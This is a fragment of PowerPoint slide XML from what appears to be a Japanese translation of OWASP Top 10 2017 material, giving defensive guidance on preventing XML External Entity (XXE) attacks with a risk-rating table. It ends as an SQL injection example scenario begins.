                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>は</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SOAP 1.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>かそれ以降のものに更新する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE Prevention'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>に従い、アプリケーション内のすべての</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>パーサで</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>外部エンティティと</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>処理を無効にする。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ホワイトリスト方式によるサーバサイドの入力検証や、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ドキュメント、ヘッダ、ノード内の悪意のあるデータのフィルタリング、またはサニタイズを実装する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>または</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ファイルのアップロード機能において、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>検証などを使用して受信する</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>を検証していることを確認する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ツールはソースコード内の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>を検出するのに役立つが、多くのインテグレーションを伴う大規模で複雑なアプリケーションでは、手動によるコードレビューが最善の選択肢である。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>もしこうしたコントロールができない場合には、仮想パッチ、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>セキュリティゲートウェイ、あるいは</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>アプリケーションファイアウォール（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）を使用して、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻撃を検出、監視、およびブロックすることを検討してください。</a:t>
            </a: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A4</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XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>外部エンティティ参照</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> (XXE)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1011470304"/>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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>悪用のしやすさ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>蔓延度</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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>検出のしやすさ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: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rgbClr val="FEFFFF"/>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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>技術面</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: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rgbClr val="FEFFFF"/>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lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>攻撃者は、脆弱なコード、依存関係、または統合を利用して、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>文書をアップロードしたり、悪意のあるコンテンツを</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ドキュメントに含めることができる場合、その脆弱な</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>プロセッサを悪用できます。</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>多くの古い</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>プロセッサにおいて、初期設定で、外部エンティティ（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>処理中に参照先のデータを取得し実行される</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>URI</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>）を指定できます。 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ツールで依存関係と構成を調べることでこの問題を発見できます。 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ツールでこの問題を検出しエクスプロイトを見つけるには手動による作業を加える必要があります。手動でテストをするなら、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>XXE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>のテスト方法を習得する必要があります。これは、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>年の時点では一般にテストされていないためです。</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:latin typeface="+mn-ea"/>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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>これらの欠陥は、その他の攻撃と同様に、データの抽出、サーバからのリモート要求の実行、内部システムのスキャン、サービス不能攻撃の実行に使用できます。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ビジネス面への影響の大きさは、この影響を受けるアプリケーションとデータを保護する必要がどれほどあるかにかかっています。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>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#1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>アプリケーションが、アカウント情報にアクセスする</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>呼出しに未検証のデータを使用しています</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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pstmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
